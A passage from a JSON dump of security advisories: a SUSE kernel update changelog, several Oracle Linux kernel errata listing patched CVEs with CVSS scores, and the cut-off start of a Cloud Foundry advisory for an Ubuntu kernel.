modem (bnc#1012382).\n - usb: phy: msm add regulator dependency (bnc#1012382).\n - usb: renesas_usbhs: missed the "running" flag in usb_dmac with rx path\n (bnc#1012382).\n - USB: serial: io_edgeport: fix possible sleep-in-atomic (bnc#1012382).\n - USB: serial: pl2303: new device id for Chilitag (bnc#1012382).\n - USB: serial: simple: add Motorola Tetra driver (bnc#1012382).\n - usb: uas: unconditionally bring back host after reset (bnc#1012382).\n - v4l: remove MEDIA_TUNER dependency for VIDEO_TUNER (bnc#1012382).\n - vb2: V4L2_BUF_FLAG_DONE is set after DQBUF (bnc#1012382).\n - vfs: do not do RCU lookup of empty pathnames (bnc#1012382).\n - vhost_net: stop device during reset owner (bnc#1012382).\n - video: fbdev: atmel_lcdfb: fix display-timings lookup (bnc#1012382).\n - video: fbdev/mmp: add MODULE_LICENSE (bnc#1012382).\n - video: fbdev: sis: remove unused variable (bnc#1012382).\n - video: fbdev: via: remove possibly unused variables (bnc#1012382).\n - video: Use bool instead int pointer for get_opt_bool() argument\n (bnc#1012382).\n - virtio_balloon: prevent uninitialized variable use (bnc#1012382).\n - vlan: Check for vlan ethernet types for 8021.q or 802.1ad (bsc#1042286).\n - vmxnet3: prevent building with 64K pages (bnc#1012382).\n - vxlan: consolidate csum flag handling (bsc#1042286).\n - vxlan: consolidate output route calculation (bsc#1042286).\n - vxlan: consolidate vxlan_xmit_skb and vxlan6_xmit_skb (bsc#1042286).\n - vxlan: do not allow overwrite of config src addr (bsc#1042286).\n - watchdog: imx2_wdt: restore previous timeout after suspend+resume\n (bnc#1012382).\n - wireless: cw1200: use __maybe_unused to hide pm functions_ (bnc#1012382).\n - x86: add MULTIUSER dependency for KVM (bnc#1012382).\n - x86/asm: Fix inline asm call constraints for GCC 4.4 (bnc#1012382).\n - x86/boot: Avoid warning for zero-filling .bss (bnc#1012382).\n - x86: bpf_jit: small optimization in emit_bpf_tail_call() (bnc#1012382).\n - x86/bugs: Drop one "mitigation" from dmesg (bnc#1012382).\n - x86/build: Silence the build with "make -s" (bnc#1012382).\n - x86/cpu/bugs: Make retpoline module warning conditional (bnc#1012382).\n - x86/cpu: Change type of x86_cache_size variable to unsigned int\n (bnc#1012382).\n - x86/entry/64: Separate cpu_current_top_of_stack from TSS.sp0\n (bsc#1077560).\n - x86/entry/64: Use a per-CPU trampoline stack for IDT entries\n (bsc#1077560).\n - x86: fix build warnign with 32-bit PAE (bnc#1012382).\n - x86/fpu/math-emu: Fix possible uninitialized variable use (bnc#1012382).\n - x86/kaiser: fix build error with KASAN && !FUNCTION_GRAPH_TRACER\n (bnc#1012382).\n - x86/kvm/vmx: do not use vm-exit instruction length for fast MMIO when\n running nested (bsc#1081431).\n - x86/mce: Pin the timer when modifying (bsc#1080851,1076282).\n - x86/microcode/AMD: Change load_microcode_amd()'s param to bool to fix\n preemptibility bug (bnc#1012382).\n - x86/microcode/AMD: Do not load when running on a hypervisor\n (bnc#1012382).\n - x86/microcode: Do the family check first (bnc#1012382).\n - x86/mm/kmmio: Fix mmiotrace for page unaligned addresses (bnc#1012382).\n - x86/nospec: Fix header guards names (bnc#1012382).\n - x86/oprofile: Fix bogus GCC-8 warning in nmi_setup() (bnc#1012382).\n - x86/paravirt: Remove 'noreplace-paravirt' cmdline option (bnc#1012382).\n - x86/platform: Add PCI dependency for PUNIT_ATOM_DEBUG (bnc#1012382).\n - x86/platform/olpc: Fix resume handler build warning (bnc#1012382).\n - x86/pti: Make unpoison of pgd for trusted boot work for real\n (bnc#1012382).\n - x86/ras/inject: Make it depend on X86_LOCAL_APIC=y (bnc#1012382).\n - x86/retpoline: Avoid retpolines for built-in __init functions\n (bnc#1012382).\n - x86/retpoline: Remove the esp/rsp thunk (bnc#1012382).\n - x86/spectre: Check CONFIG_RETPOLINE in command line parser (bnc#1012382).\n - x86/spectre: Fix an error message (git-fixes).\n - x86/spectre: Fix spelling mistake: "vunerable"-> "vulnerable"\n (bnc#1012382).\n - x86/spectre: Remove the out-of-tree RSB stuffing\n - x86/spectre: Simplify spectre_v2 command line parsing (bnc#1012382).\n - x86/speculation: Fix typo IBRS_ATT, which should be IBRS_ALL\n (bnc#1012382).\n - x86/xen: Zero MSR_IA32_SPEC_CTRL before suspend (bnc#1065600).\n - xen/gntdev: Fix off-by-one error when unmapping with holes (bnc#1012382).\n - xen/gntdev: Fix partial gntdev_mmap() cleanup (bnc#1012382).\n - xen-netfront: enable device after manual module load (bnc#1012382).\n - xen-netfront: remove warning when unloading module (bnc#1012382).\n - xen: XEN_acpi_PROCESSOR is Dom0-only (bnc#1012382).\n - xfrm: check id proto in validate_tmpl() (bnc#1012382).\n - xfrm: Fix stack-out-of-bounds read on socket policy lookup (bnc#1012382).\n - xfrm: Fix stack-out-of-bounds with misconfigured transport mode policies\n (bnc#1012382).\n - xfrm_user: propagate sec ctx allocation errors (bsc#1042286).\n - xfs: do not chain ioends during writepage submission (bsc#1077285\n bsc#1043441).\n - xfs: factor mapping out of xfs_do_writepage (bsc#1077285 bsc#1043441).\n - xfs: Introduce writeback context for writepages (bsc#1077285\n bsc#1043441).\n - xfs: ioends require logically contiguous file offsets (bsc#1077285\n bsc#1043441).\n - xfs: quota: check result of register_shrinker() (bnc#1012382).\n - xfs: quota: fix missed destroy of qi_tree_lock (bnc#1012382).\n - xfs: reinit btree pointer on attr tree inactivation walk (bsc#1078787).\n - xfs: remove nonblocking mode from xfs_vm_writepage (bsc#1077285\n bsc#1043441).\n - xfs: remove racy hasattr check from attr ops (bsc#1035432).\n - xfs: remove xfs_cancel_ioend (bsc#1077285 bsc#1043441).\n - xfs: stop searching for free slots in an inode chunk when there are none\n (bsc#1072739).\n - xfs: toggle readonly state around xfs_log_mount_finish (bsc#1073401).\n - xfs: ubsan fixes (bnc#1012382).\n - xfs: validate sb_logsunit is a multiple of the fs blocksize\n (bsc#1077513).\n - xfs: write unmount record for ro mounts (bsc#1073401).\n - xfs: xfs_cluster_write is redundant (bsc#1077285 bsc#1043441).\n - xtensa: fix futex_atomic_cmpxchg_inatomic (bnc#1012382).\n\n", "edition": 1, "modified": "2018-03-23T18:08:51", "published": "2018-03-23T18:08:51", "href": "http://lists.opensuse.org/opensuse-security-announce/2018-03/msg00055.html", "id": "SUSE-SU-2018:0785-1", "type": "suse", "title": "Security update for the Linux Kernel (important)", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:36:20", "bulletinFamily": "unix", "cvelist": ["CVE-2016-3139", "CVE-2019-11190", "CVE-2016-1583", "CVE-2017-13305", "CVE-2017-16650", "CVE-2018-19985"], "description": "kernel-uek\n[3.8.13-118.34.1]\n- Input: wacom - move the USB (now hid) Wacom driver in drivers/hid (Benjamin Tissoires) [Orabug: 25512494] {CVE-2016-3139}\n- net: qmi_wwan: fix divide by 0 on bad descriptors (Bjorn Mork) [Orabug: 27215229] {CVE-2017-16650}\n- USB: hso: Fix OOB memory access in hso_probe/hso_get_config_data (Hui Peng) [Orabug: 29605987] {CVE-2018-19985} {CVE-2018-19985}\n- KEYS: encrypted: fix buffer overread in valid_master_desc() (Eric Biggers) [Orabug: 29605993] {CVE-2017-13305}\n- ecryptfs: don't allow mmap when the lower fs doesn't support it (Jeff Mahoney) [Orabug: 29666607] {CVE-2016-1583} {CVE-2016-1583}\n- Revert 'ecryptfs: forbid opening files without mmap handler' (Brian Maly) [Orabug: 29666607] {CVE-2016-1583}\n- binfmt_elf: switch to new creds when switching to new mm (Linus Torvalds) [Orabug: 29677234] {CVE-2019-11190}", "edition": 3, "modified": "2019-05-16T00:00:00", "published": "2019-05-16T00:00:00", "id": "ELSA-2019-4644", "href": "http://linux.oracle.com/errata/ELSA-2019-4644.html", "title": "Unbreakable Enterprise kernel security update", "type": "oraclelinux", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:39:36", "bulletinFamily": "unix", "cvelist": ["CVE-2016-9191", "CVE-2017-15649", "CVE-2017-16527", "CVE-2017-12192", "CVE-2017-16650", "CVE-2017-2618", "CVE-2017-1000405", "CVE-2017-12190"], "description": "[4.1.12-103.10.1]\n- mm, thp: Do not make page table dirty unconditionally in follow_trans_huge_pmd() (Kirill A. Shutemov) [Orabug: 27200879] {CVE-2017-1000405}\n- NFS: Add static NFS I/O tracepoints (Chuck Lever) \n- storvsc: dont assume SG list is contiguous (Aruna Ramakrishna) [Orabug: 27044692] \n- fix unbalanced page refcounting in bio_map_user_iov (Vitaly Mayatskikh) [Orabug: 27069038] {CVE-2017-12190}\n- more bio_map_user_iov() leak fixes (Al Viro) [Orabug: 27069038] {CVE-2017-12190}\n- packet: in packet_do_bind, test fanout with bind_lock held (Willem de Bruijn) [Orabug: 27069065] {CVE-2017-15649}\n- packet: hold bind lock when rebinding to fanout hook (Willem de Bruijn) [Orabug: 27069065] {CVE-2017-15649}\n- net: convert packet_fanout.sk_ref from atomic_t to refcount_t (Reshetova, Elena) [Orabug: 27069065] {CVE-2017-15649}\n- packet: fix races in fanout_add() (Eric Dumazet) [Orabug: 27069065] {CVE-2017-15649}\n- refcount_t: Introduce a special purpose refcount type (Peter Zijlstra) [Orabug: 27069065] {CVE-2017-15649}\n- locking/atomics: Add _{acquire|release|relaxed}() variants of some atomic operations (Will Deacon) [Orabug: 27069065] {CVE-2017-15649}\n- net: qmi_wwan: fix divide by 0 on bad descriptors (Bjorn Mork) [Orabug: 27215225] {CVE-2017-16650}\n- ALSA: usb-audio: Kill stray URB at exiting (Takashi Iwai) [Orabug: 27148276] {CVE-2017-16527}\n- scsi: Add STARGET_CREATED_REMOVE state to scsi_target_state (Ewan D. Milne) [Orabug: 27187217] \n- ocfs2: fix posix_acl_create deadlock (Junxiao Bi) [Orabug: 27126129] \n- scsi: Dont abort scsi_scan due to unexpected response (John Sobecki) [Orabug: 27119628] \n- ocfs2: code clean up for direct io (Ryan Ding) \n- xscore: add dma address check (Zhu Yanjun) [Orabug: 27076919] \n- KVM: nVMX: Fix loss of L2s NMI blocking state (Wanpeng Li) [Orabug: 27062498] \n- KVM: nVMX: track NMI blocking state separately for each VMCS (Paolo Bonzini) [Orabug: 27062498] \n- KVM: VMX: require virtual NMI support (Paolo Bonzini) [Orabug: 27062498] \n- KVM: nVMX: Fix the NMI IDT-vectoring handling (Wanpeng Li) [Orabug: 27062498] \n- uek-rpm: disable CONFIG_NUMA_BALANCING_DEFAULT_ENABLED (Fred Herard) [Orabug: 26798697] \n- thp: run vma_adjust_trans_huge() outside i_mmap_rwsem (Kirill A. Shutemov) [Orabug: 27026180] \n- selinux: fix off-by-one in setprocattr (Stephen Smalley) [Orabug: 27001717] {CVE-2017-2618} {CVE-2017-2618} {CVE-2017-2618}\n- sysctl: Drop reference added by grab_header in proc_sys_readdir (Zhou Chengming) [Orabug: 27036903] {CVE-2016-9191} {CVE-2016-9191} {CVE-2016-9191}\n- KEYS: prevent KEYCTL_READ on negative key (Eric Biggers) [Orabug: 27050248] {CVE-2017-12192}\n- IB/ipoib: For sendonly join free the multicast group on leave (Christoph Lameter) [Orabug: 27077718] \n- IB/ipoib: increase the max mcast backlog queue (Doug Ledford) [Orabug: 27077718] \n- IB/ipoib: Make sendonly multicast joins create the mcast group (Doug Ledford) [Orabug: 27077718] \n- IB/ipoib: Expire sendonly multicast joins (Christoph Lameter) [Orabug: 27077718] \n- IB/ipoib: Suppress warning for send only join failures (Jason Gunthorpe) [Orabug: 27077718] \n- IB/ipoib: Clean up send-only multicast joins (Doug Ledford) [Orabug: 27077718] \n- netlink: allow to listen 'all' netns (Nicolas Dichtel) [Orabug: 27077944] \n- netlink: rename private flags and states (Nicolas Dichtel) [Orabug: 27077944] \n- netns: use a spin_lock to protect nsid management (Nicolas Dichtel) [Orabug: 27077944] \n- netns: notify new nsid outside __peernet2id() (Nicolas Dichtel) [Orabug: 27077944] \n- netns: rename peernet2id() to peernet2id_alloc() (Nicolas Dichtel) [Orabug: 27077944] \n- netns: always provide the id to rtnl_net_fill() (Nicolas Dichtel) [Orabug: 27077944] \n- netns: returns always an id in __peernet2id() (Nicolas Dichtel) [Orabug: 27077944] \n- Hang/soft lockup in d_invalidate with simultaneous calls (Al Viro) [Orabug: 27052681] \n- Revert 'drivers/char/mem.c: deny access in open operation when securelevel is set' (Brian Maly) [Orabug: 27037811]", "edition": 4, "modified": "2017-12-07T00:00:00", "published": "2017-12-07T00:00:00", "id": "ELSA-2017-3651", "href": "http://linux.oracle.com/errata/ELSA-2017-3651.html", "title": "Unbreakable Enterprise kernel security update", "type": "oraclelinux", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-04T00:41:14", "bulletinFamily": "unix", "cvelist": ["CVE-2019-10639", "CVE-2019-19062", "CVE-2020-10732", "CVE-2019-19535", "CVE-2019-10638", "CVE-2017-16644", "CVE-2019-20811", "CVE-2019-19049"], "description": "[4.1.12-124.42.3]\n- can: peak_usb: pcan_usb_fd: Fix info-leaks to USB devices (Tomas Bortoli) [Orabug: 31351221] {CVE-2019-19535}\n- media: hdpvr: Fix an error handling path in hdpvr_probe() (Arvind Yadav) [Orabug: 31352053] {CVE-2017-16644}\n- fs/binfmt_misc.c: do not allow offset overflow (Thadeu Lima de Souza Cascardo) [Orabug: 31588258] \n- clear inode and truncate pages before enqueuing for async inactivation (Gautham Ananthakrishna) [Orabug: 31744270]\n[4.1.12-124.42.2]\n- mm: create alloc_last_chance debugfs entries (Mike Kravetz) [Orabug: 31295499] \n- mm: perform 'last chance' reclaim efforts before allocation failure (Mike Kravetz) [Orabug: 31295499] \n- mm: let page allocation slowpath retry 'order' times (Mike Kravetz) [Orabug: 31295499] \n- fix kABI breakage from 'netns: provide pure entropy for net_hash_mix()' (Dan Duval) [Orabug: 31351904] {CVE-2019-10638} {CVE-2019-10639}\n- netns: provide pure entropy for net_hash_mix() (Eric Dumazet) [Orabug: 31351904] {CVE-2019-10638} {CVE-2019-10639}\n- hrtimer: Annotate lockless access to timer->base (Eric Dumazet) [Orabug: 31380495] \n- rds: ib: Revert 'net/rds: Avoid stalled connection due to CM REQ retries' (Hakon Bugge) [Orabug: 31648141] \n- rds: Clear reconnect pending bit (Hakon Bugge) [Orabug: 31648141] \n- RDMA/netlink: Do not always generate an ACK for some netlink operations (Hakon Bugge) [Orabug: 31666975] \n- genirq/proc: Return proper error code when irq_set_affinity() fails (Wen Yaxng) [Orabug: 31723450]\n[4.1.12-124.42.1]\n- fs/binfmt_elf.c: allocate initialized memory in fill_thread_core_info() (Alexander Potapenko) [Orabug: 31350639] {CVE-2020-10732}\n- crypto: user - fix memory leak in crypto_report (Navid Emamdoost) [Orabug: 31351640] {CVE-2019-19062}\n- of: unittest: fix memory leak in unittest_data_add (Navid Emamdoost) [Orabug: 31351702] {CVE-2019-19049}\n- IB/sa: Resolv use-after-free in ib_nl_make_request() (Divya Indi) [Orabug: 31656992] \n- net-sysfs: call dev_hold if kobject_init_and_add success (YueHaibing) [Orabug: 31687545] {CVE-2019-20811}", "edition": 2, "modified": "2020-09-03T00:00:00", "published": "2020-09-03T00:00:00", "id": "ELSA-2020-5837", "href": "http://linux.oracle.com/errata/ELSA-2020-5837.html", "title": "Unbreakable Enterprise kernel security update", "type": "oraclelinux", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:37:40", "bulletinFamily": "unix", "cvelist": ["CVE-2017-15299", "CVE-2017-17741", "CVE-2017-15129", "CVE-2017-7294", "CVE-2017-16994", "CVE-2017-17448", "CVE-2018-5332", "CVE-2017-15116", "CVE-2017-17449"], "description": "[4.1.12-124.15.1]\n- netfilter: nfnetlink_cthelper: Add missing permission checks (Kevin Cernekee) [Orabug: 27260771] {CVE-2017-17448}\n- netlink: Add netns check on taps (Kevin Cernekee) [Orabug: 27260799] {CVE-2017-17449}\n- KVM: Fix stack-out-of-bounds read in write_mmio (Wanpeng Li) [Orabug: 27290606] {CVE-2017-17741} {CVE-2017-17741}\n- xprtrdma: Detect unreachable NFS/RDMA servers more reliably (Chuck Lever) [Orabug: 27587008] \n- sunrpc: Export xprt_force_disconnect() (Chuck Lever) [Orabug: 27587008] \n- sunrpc: Allow xprt->ops->timer method to sleep (Chuck Lever) [Orabug: 27587008] \n- KVM: nVMX: fix guest CR4 loading when emulating L2 to L1 exit (Haozhong Zhang) [Orabug: 27720128] \n- x86/microcode: probe CPU features on microcode update (Ankur Arora) [Orabug: 27878230] \n- x86/microcode: microcode_write() should not reference boot_cpu_data (Ankur Arora) [Orabug: 27878230] \n- x86/cpufeatures: use cpu_data in init_scattered_cpuid_flags() (Ankur Arora) [Orabug: 27878230] \n- mm/pagewalk.c: report holes in hugetlb ranges (Jann Horn) [Orabug: 27913118] {CVE-2017-16994}\n- KEYS: dont let add_key() update an uninstantiated key (David Howells) [Orabug: 27913330] {CVE-2017-15299}\n- drm/vmwgfx: NULL pointer dereference in vmw_surface_define_ioctl() (Murray McAllister) [Orabug: 27913367] {CVE-2017-7294}\n- vmscan: Support multiple kswapd threads per node (Buddy Lumpkin) [Orabug: 27913411] \n- tcp: dont use F-RTO on non-recurring timeouts (Yuchung Cheng) [Orabug: 27901860] \n- net/rds: ib: Release correct number of frags (Hakon Bugge) [Orabug: 27924161] \n- crypto: rng - Remove old low-level rng interface (Herbert Xu) [Orabug: 27926676] {CVE-2017-15116}\n- crypto: drbg - Convert to new rng interface (Herbert Xu) [Orabug: 27926676] {CVE-2017-15116}\n- crypto: ansi_cprng - Convert to new rng interface (Herbert Xu) [Orabug: 27926676] {CVE-2017-15116}\n- crypto: krng - Convert to new rng interface (Herbert Xu) [Orabug: 27926676] {CVE-2017-15116}\n- RDS: Heap OOB write in rds_message_alloc_sgs() (Mohamed Ghannam) [Orabug: 27934066] {CVE-2018-5332}\n- net: Fix double free and memory corruption in get_net_ns_by_id() (Eric W. Biederman) [Orabug: 27934789] {CVE-2017-15129}", "edition": 4, "modified": "2018-05-15T00:00:00", "published": "2018-05-15T00:00:00", "id": "ELSA-2018-4108", "href": "http://linux.oracle.com/errata/ELSA-2018-4108.html", "title": "Unbreakable Enterprise kernel security update", "type": "oraclelinux", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:11", "bulletinFamily": "unix", "cvelist": ["CVE-2017-0861", "CVE-2017-16649", "CVE-2017-16527", "CVE-2018-100199", "CVE-2017-16526", "CVE-2017-16533", "CVE-2017-5715", "CVE-2017-16536", "CVE-2017-15868"], "description": "[2.6.39-400.298.6]\n- perf/hwbp: Simplify the perf-hwbp code, fix documentation (Linus Torvalds) [Orabug: 27947612] {CVE-2018-100199}\n[2.6.39-400.298.5]\n- xen-netfront: fix rx stall when req_prod_pvt goes back to more than zero again (Dongli Zhang) [Orabug: 25053376] \n- x86/IBRS: Remove support for IBRS_ENABLED_USER mode (Boris Ostrovsky) [Orabug: 27430615] \n- x86/microcode/intel: Disable late loading on model 79 (Borislav Petkov) [Orabug: 27343579]\n[2.6.39-400.298.4]\n- ALSA: usb-audio: Kill stray URB at exiting (Takashi Iwai) [Orabug: 27148283] {CVE-2017-16527}\n- uwb: properly check kthread_run return value (Andrey Konovalov) [Orabug: 27206900] {CVE-2017-16526}\n- HID: usbhid: fix out-of-bounds bug (Jaejoong Kim) [Orabug: 27207935] {CVE-2017-16533}\n- cx231xx-cards: fix NULL-deref on missing association descriptor (Johan Hovold) [Orabug: 27208080] {CVE-2017-16536}\n- net: cdc_ether: fix divide by 0 on bad descriptors (Bjorn Mork) [Orabug: 27215206] {CVE-2017-16649}\n- Bluetooth: bnep: bnep_add_connection() should verify that its dealing with l2cap socket (Al Viro) [Orabug: 27344787] {CVE-2017-15868}\n- Bluetooth: hidp: verify l2cap sockets (David Herrmann) [Orabug: 27344787] {CVE-2017-15868}\n- ALSA: pcm: prevent UAF in snd_pcm_info (Robb Glasser) [Orabug: 27344840] {CVE-2017-0861} {CVE-2017-0861}\n- Addendum: x86/cpufeature: Blacklist SPEC_CTRL/PRED_CMD on early Spectre v2 microcodes (David Woodhouse) [Orabug: 27516441] \n- x86/cpufeature: Add X86_FEATURE_IA32_ARCH_CAPS and X86_FEATURE_IBRS_ATT (David Woodhouse) [Orabug: 27649498] {CVE-2017-5715}\n- x86/cpufeatures: Clean up Spectre v2 related CPUID flags (David Woodhouse) [Orabug: 27649510] {CVE-2017-5715}\n- x86/spectre: Now that we expose 'stbibp' make sure it is correct. (Konrad Rzeszutek Wilk) [Orabug: 27649631] {CVE-2017-5715}\n- x86/speculation: Add basic IBPB (Indirect Branch Prediction Barrier) support (KarimAllah Ahmed) [Orabug: 27649640] {CVE-2017-5715}\n- x86: Add STIBP feature enumeration (David Woodhouse) [Orabug: 27649693] {CVE-2017-5715}\n- x86/cpu/AMD: Add speculative control support for AMD (Tom Lendacky) [Orabug: 27649706] {CVE-2017-5715}\n- x86/spectre_v2: Dont spam the console with these: (Konrad Rzeszutek Wilk) [Orabug: 27649723] {CVE-2017-5715}\n- x86/spectre_v2: Remove 0xc2 from spectre_bad_microcodes (Darren Kenny) [Orabug: 27600848] \n- Revert 'x86/spec_ctrl: Add 'nolfence' knob to disable fallback for spectre_v2 mitigation' (Konrad Rzeszutek Wilk) [Orabug: 27601773] \n- x86/syscall: run syscall exit code with extra registers cleared (Alexandre Chartre) [Orabug: 27501176] \n- x86/syscall: run syscall-specific code with extra registers cleared (Alexandre Chartre) [Orabug: 27501176] \n- x86/syscall: run syscall entry code with extra registers cleared (Alexandre Chartre) [Orabug: 27501176] \n- x86/spectre: Drop the warning about ibrs being obsolete (Konrad Rzeszutek Wilk) [Orabug: 27518974] \n- x86: Include linux/device.h in bugs_64.c (Boris Ostrovsky) [Orabug: 27519044] \n- x86: fix mitigation details of UEK2 spectre v1 (Konrad Rzeszutek Wilk) [Orabug: 27509909] \n- x86/cpufeature: Blacklist SPEC_CTRL/PRED_CMD on early Spectre v2 microcodes (David Woodhouse) [Orabug: 27516441] {CVE-2017-5715}\n- x86, intel: Output microcode revision in /proc/cpuinfo (Andi Kleen) [Orabug: 27516441] \n- x86: intel-family.h: Add GEMINI_LAKE SOC (Len Brown) [Orabug: 27516441] \n- x86/cpu/intel: Introduce macros for Intel family numbers (Dave Hansen) [Orabug: 27516441] \n- x86/mitigation/spectre_v2: Add reporting of 'lfence' (Konrad Rzeszutek Wilk) [Orabug: 27525958] \n- x86/spec: Add 'lfence_enabled' in sysfs (Konrad Rzeszutek Wilk) [Orabug: 27525954] \n- x86/spec_ctrl: Add 'nolfence' knob to disable fallback for spectre_v2 mitigation (Konrad Rzeszutek Wilk) [Orabug: 27525923] \n- x86/spec: Also print IBRS if IBPB is disabled (Konrad Rzeszutek Wilk) [Orabug: 27519083] \n- x86: Use Indirect Branch Prediction Barrier in context switch (Tim Chen) [Orabug: 27516378]", "edition": 4, "modified": "2018-05-01T00:00:00", "published": "2018-05-01T00:00:00", "id": "ELSA-2018-4088", "href": "http://linux.oracle.com/errata/ELSA-2018-4088.html", "title": "Unbreakable Enterprise kernel security update", "type": "oraclelinux", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:38:20", "bulletinFamily": "unix", "cvelist": ["CVE-2017-0861", "CVE-2017-16649", "CVE-2017-16527", "CVE-2017-15115", "CVE-2017-14140", "CVE-2018-100199", "CVE-2017-16533", "CVE-2017-5715", "CVE-2017-16536", "CVE-2017-15868"], "description": "kernel-uek\n[3.8.13-118.20.6]\n- perf/hwbp: Simplify the perf-hwbp code, fix documentation (Linus Torvalds) [Orabug: 27947608] {CVE-2018-100199}\n[3.8.13-118.20.5]\n- x86/microcode: probe CPU features on microcode update (Ankur Arora) [Orabug: 27806667] \n- x86/microcode: microcode_write() should not reference boot_cpu_data (Ankur Arora) [Orabug: 27806667] \n- x86/cpufeatures: use cpu_data in init_scattered_cpuid_flags() (Ankur Arora) [Orabug: 27806667]\n[3.8.13-118.20.4]\n- Drivers: hv: fcopy: set .owner reference for file operations (Joe Jin) [Orabug: 21191022] \n- ALSA: usb-audio: Kill stray URB at exiting (Takashi Iwai) [Orabug: 27148281] {CVE-2017-16527}\n- HID: usbhid: fix out-of-bounds bug (Jaejoong Kim) [Orabug: 27207929] {CVE-2017-16533}\n- [media] cx231xx-cards: fix NULL-deref on missing association descriptor (Johan Hovold) [Orabug: 27208072] {CVE-2017-16536}\n- net: cdc_ether: fix divide by 0 on bad descriptors (Bjorn Mork) [Orabug: 27215201] {CVE-2017-16649}\n- x86/microcode/intel: Extend BDW late-loading with a revision check (Jia Zhang) [Orabug: 27343577] \n- x86/microcode/intel: Disable late loading on model 79 (Borislav Petkov) [Orabug: 27343577] \n- Bluetooth: bnep: bnep_add_connection() should verify that its dealing with l2cap socket (Al Viro) [Orabug: 27344793] {CVE-2017-15868}\n- Bluetooth: hidp: verify l2cap sockets (David Herrmann) [Orabug: 27344793] {CVE-2017-15868}\n- ALSA: pcm: prevent UAF in snd_pcm_info (Robb Glasser) [Orabug: 27344843] {CVE-2017-0861} {CVE-2017-0861}\n- ptrace: use fsuid, fsgid, effective creds for fs access checks (Jann Horn) [Orabug: 27364691] {CVE-2017-14140}\n- sctp: do not peel off an assoc from one netns to another one (Xin Long) [Orabug: 27387001] {CVE-2017-15115}\n- Revert 'x86/spec_ctrl: Add 'nolfence' knob to disable fallback for spectre_v2 mitigation' (Ankur Arora) [Orabug: 27601787] {CVE-2017-5715}\n- Revert 'x86/spec: Add 'lfence_enabled' in sysfs' (Ankur Arora) [Orabug: 27601787] {CVE-2017-5715}\n- Revert 'x86/mitigation/spectre_v2: Add reporting of 'lfence'' (Ankur Arora) [Orabug: 27601787] {CVE-2017-5715}\n- x86/mitigation/spectre_v2: Add reporting of 'lfence' (Konrad Rzeszutek Wilk) {CVE-2017-5715}\n- x86/spec: Add 'lfence_enabled' in sysfs (Konrad Rzeszutek Wilk) {CVE-2017-5715}\n- x86/spec_ctrl: Add 'nolfence' knob to disable fallback for spectre_v2 mitigation (Konrad Rzeszutek Wilk) {CVE-2017-5715}\n- x86/spectre: bring spec_ctrl management logic closer to UEK4 (Ankur Arora) [Orabug: 27516512] {CVE-2017-5715}\n- x86/cpufeatures: Clean up Spectre v2 related CPUID flags (David Woodhouse) [Orabug: 27516357] {CVE-2017-5715}\n- x86/spectre_v2: Remove 0xc2 from spectre_bad_microcodes (Darren Kenny) [Orabug: 27516419] {CVE-2017-5715}\n- x86/cpufeature: Blacklist SPEC_CTRL/PRED_CMD on early Spectre v2 microcodes (David Woodhouse) [Orabug: 27516419] {CVE-2017-5715}\n- x86: intel-family.h: Add GEMINI_LAKE SOC (Len Brown) [Orabug: 27516419] \n- x86/cpu/intel: Introduce macros for Intel family numbers (Dave Hansen) [Orabug: 27516419] \n- x86/spectre: expose 'stibp' (Konrad Rzeszutek Wilk) [Orabug: 27516419] {CVE-2017-5715}\n- x86/speculation: Add basic IBPB (Indirect Branch Prediction Barrier) support (David Woodhouse) [Orabug: 27516379] {CVE-2017-5715}\n- x86/speculation: Use Indirect Branch Prediction Barrier in context switch (Tim Chen) [Orabug: 27516379] {CVE-2017-5715}\n- x86/spectre: fix spectre_v1 mitigation indicators (Ankur Arora) [Orabug: 27509932] {CVE-2017-5715}\n- x86/ia32/syscall: Clear extended registers %r8-%r15 (Ankur Arora) [Orabug: 27452028] {CVE-2017-5715}\n- x86/ia32/syscall: Save full stack frame throughout the entry code (Ankur Arora) [Orabug: 27452028] {CVE-2017-5715}\n- x86/ia32/syscall: cleanup trailing whitespace (Ankur Arora) [Orabug: 27452028] {CVE-2017-5715}\n- x86/syscall: Clear callee saved registers (%r12-%r15, %rbp, %rbx) (Ankur Arora) [Orabug: 27452028] {CVE-2017-5715}\n- x86/syscall: Save callee saved registers on syscall entrance (Ankur Arora) [Orabug: 27452028] {CVE-2017-5715}", "edition": 4, "modified": "2018-05-02T00:00:00", "published": "2018-05-02T00:00:00", "id": "ELSA-2018-4089", "href": "http://linux.oracle.com/errata/ELSA-2018-4089.html", "title": "Unbreakable Enterprise kernel security update", "type": "oraclelinux", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "cloudfoundry": [{"lastseen": "2019-05-29T18:32:46", "bulletinFamily": "software", "cvelist": ["CVE-2018-8043", "CVE-2017-17450", "CVE-2017-17558", "CVE-2017-16913", "CVE-2018-5333", "CVE-2017-17741", "CVE-2017-17862", "CVE-2017-18075", "CVE-2017-0861", "CVE-2017-7518", "CVE-2017-18203", "CVE-2017-17805", "CVE-2017-16912", "CVE-2017-16532", "CVE-2017-16649", "CVE-2017-16995", "CVE-2017-11472", "CVE-2018-5344", "CVE-2017-16537", "CVE-2017-18204", "CVE-2018-6927", "CVE-2017-15129", "CVE-2017-16994", "CVE-2017-17448", "CVE-2017-16646", "CVE-2017-16536", "CVE-2017-1000407", "CVE-2017-18208", "CVE-2017-16911", "CVE-2018-7492", "CVE-2018-5332", "CVE-2017-17449", "CVE-2017-16650", "CVE-2017-17807", "CVE-2018-1000026", "CVE-2017-16528", "CVE-2017-16914", "CVE-2017-16645", "CVE-2017-17806"], "description": "# \n\n# Severity\n\nHigh\n\n# Vendor\n\nCanonical Ubuntu\n\n# Versions Affected\n\n * Canonical Ubuntu 14.04\n\n# Description\n\nUSN-3619-1 fixed vulnerabilities in the Linux kernel for Ubuntu 16.04 LTS. This update provides the corresponding updates for the Linux Hardware Enablement (HWE) kernel from Ubuntu 16.04 